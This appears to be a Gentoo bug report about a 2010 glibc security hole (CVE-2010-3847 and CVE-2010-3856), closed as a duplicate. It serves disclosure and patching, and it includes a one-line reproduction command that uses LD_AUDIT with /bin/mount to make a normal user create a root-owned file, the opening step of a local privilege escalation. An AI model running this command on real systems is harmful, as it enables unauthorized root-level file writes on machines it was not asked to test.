Announced on the Funtoo forums was a security hole in glibc. The test for the vulnerability was to enter this into the terminal as a normal user umask 0 && LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="lolwhat" /bin/mount And if one is on an effected system, there would appear a file "lolwhat" that is owned by root. I've tried this on Gentoo with sys-libs/glibc-2.11.2 and this also effects Gentoo Reproducible: Always Steps to Reproduce: 1. Open up terminal 2. As a normal user, run this in the terminal umask 0 && LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="lolwhat" /bin/mount 3. ls -l lolwhat Actual Results: a file is created, and it is owned by root Expected Results: Not sure.. I'm assuming nothing should happen CVE-2010-3847 and CVE-2010-3856 were mentioned in the Funtoo announcement. http://seclists.org/fulldisclosure/2010/Oct/257 http://seclists.org/fulldisclosure/2010/Oct/344
Please search next time, security bugs are often duplicated! Thanks in advance. *** This bug has been marked as a duplicate of bug 341755 ***